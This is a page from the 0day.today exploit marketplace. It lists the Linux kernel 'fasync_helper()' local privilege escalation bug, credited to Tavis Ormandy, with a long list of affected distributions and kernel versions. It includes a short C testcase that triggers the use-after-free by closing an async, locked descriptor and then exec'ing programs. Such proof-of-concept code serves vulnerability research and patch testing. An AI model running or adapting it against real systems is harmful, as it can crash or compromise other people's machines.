0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux Kernel 'fasync_helper()' Local Privilege Escalation Vulnerability
[=======================================================================
Linux Kernel 'fasync_helper()' Local Privilege Escalation Vulnerability
=======================================================================
Credit: Tavis Ormandy
Vulnerable: Ubuntu Ubuntu Linux 9.10 sparc
Ubuntu Ubuntu Linux 9.10 powerpc
Ubuntu Ubuntu Linux 9.10 lpia
Ubuntu Ubuntu Linux 9.10 i386
Ubuntu Ubuntu Linux 9.10 amd64
Ubuntu Ubuntu Linux 9.04 sparc
Ubuntu Ubuntu Linux 9.04 powerpc
Ubuntu Ubuntu Linux 9.04 lpia
Ubuntu Ubuntu Linux 9.04 i386
Ubuntu Ubuntu Linux 9.04 amd64
Ubuntu Ubuntu Linux 8.10 sparc
Ubuntu Ubuntu Linux 8.10 powerpc
Ubuntu Ubuntu Linux 8.10 lpia
Ubuntu Ubuntu Linux 8.10 i386
Ubuntu Ubuntu Linux 8.10 amd64
Ubuntu Ubuntu Linux 8.04 LTS sparc
Ubuntu Ubuntu Linux 8.04 LTS powerpc
Ubuntu Ubuntu Linux 8.04 LTS lpia
Ubuntu Ubuntu Linux 8.04 LTS i386
Ubuntu Ubuntu Linux 8.04 LTS amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
S.u.S.E. openSUSE 11.2
RedHat Fedora 11
RedHat Enterprise Linux Desktop 5 client
RedHat Enterprise Linux 5.3.z server
RedHat Enterprise Linux 5 server
Linux kernel 2.6.32
Linux kernel 2.6.31 5
Linux kernel 2.6.31 .2
Linux kernel 2.6.31 .11
Linux kernel 2.6.31 -rc7
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.31 -rc6
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.31 -rc3
Linux kernel 2.6.31 -rc1
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.31
Linux kernel 2.6.30 .1
Linux kernel 2.6.30 -rc6
Linux kernel 2.6.30 -rc5
Linux kernel 2.6.30 -rc3
Linux kernel 2.6.30 -rc2
Linux kernel 2.6.30 -rc1
Linux kernel 2.6.30
Linux kernel 2.6.29 .4
Linux kernel 2.6.29 .1
Linux kernel 2.6.29 -git8
Linux kernel 2.6.29 -git14
Linux kernel 2.6.29 -git1
Linux kernel 2.6.29
Linux kernel 2.6.28 .9
Linux kernel 2.6.28 .8
Linux kernel 2.6.28 .6
Linux kernel 2.6.28 .5
Linux kernel 2.6.28 .3
Linux kernel 2.6.28 .2
Linux kernel 2.6.28 .1
Linux kernel 2.6.28 -rc7
Linux kernel 2.6.28 -rc5
Linux kernel 2.6.28 -rc1
Linux kernel 2.6.28 -git7
Linux kernel 2.6.28
Linux kernel 2.6.33-rc4
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.32-rc8
Linux kernel 2.6.32-rc7
Linux kernel 2.6.32-rc5
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.32-rc4
Linux kernel 2.6.32-rc3
Linux kernel 2.6.32-rc2
Linux kernel 2.6.32-rc1
Linux kernel 2.6.31.6
Linux kernel 2.6.31.4
Linux kernel 2.6.31.2
Linux kernel 2.6.31.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.31-rc9
Linux kernel 2.6.31-rc8
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.31-rc7
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.31-rc5-git3
Linux kernel 2.6.31-rc4
Linux kernel 2.6.31-rc2
Linux kernel 2.6.31-git11
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.30.5
Linux kernel 2.6.30.4
Linux kernel 2.6.30.3
Linux kernel 2.6.29-rc2-git1
Linux kernel 2.6.29-rc2
Linux kernel 2.6.29-rc1
Linux kernel 2.6.28.4
Linux kernel 2.6.28.10
Avaya Voice Portal 5.0
Avaya Aura System Platform 1.1
Avaya Aura System Manager 5.2
Avaya Aura SIP Enablement Services 5.2.1
Avaya Aura SIP Enablement Services 5.2
Avaya Aura Session Manager 5.2
Avaya Aura Session Manager 1.1
Avaya Aura Communication Manager 5.2
Avaya Aura Application Enablement Services 5.2
#ifndef _GNU_SOURCE
# define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdint.h>
#include <stdbool.h>
#include <fcntl.h>
#include <stdlib.h>
#include <assert.h>
#include <asm/ioctls.h>
// Testcase for locked async fd bug -- taviso 16-Dec-2009
int main(int argc, char **argv)
{
int fd;
pid_t child;
unsigned flag = ~0;
fd = open("/dev/urandom", O_RDONLY);
// set up exclusive lock, but dont block
flock(fd, LOCK_EX | LOCK_NB);
// set ASYNC flag on descriptor
ioctl(fd, FIOASYNC, &flag);
// close the file descriptor to trigger the bug
close(fd);
// now exec some stuff to populate the AT_RANDOM entries, which will cause
// the released file to be used.
// This assumes /bin/true is an elf executable, and that this kernel
// supports AT_RANDOM.
do switch (child = fork()) {
case 0: execl("/bin/true", "/bin/true", NULL);
abort();
case -1: fprintf(stderr, "fork() failed, %m\n");
break;
default: fprintf(stderr, ".");
break;
} while (waitpid(child, NULL, 0) != -1);
fprintf(stderr, "waitpid() failed, %m\n");
return 1;
}
# 0day.today [2024-09-28] #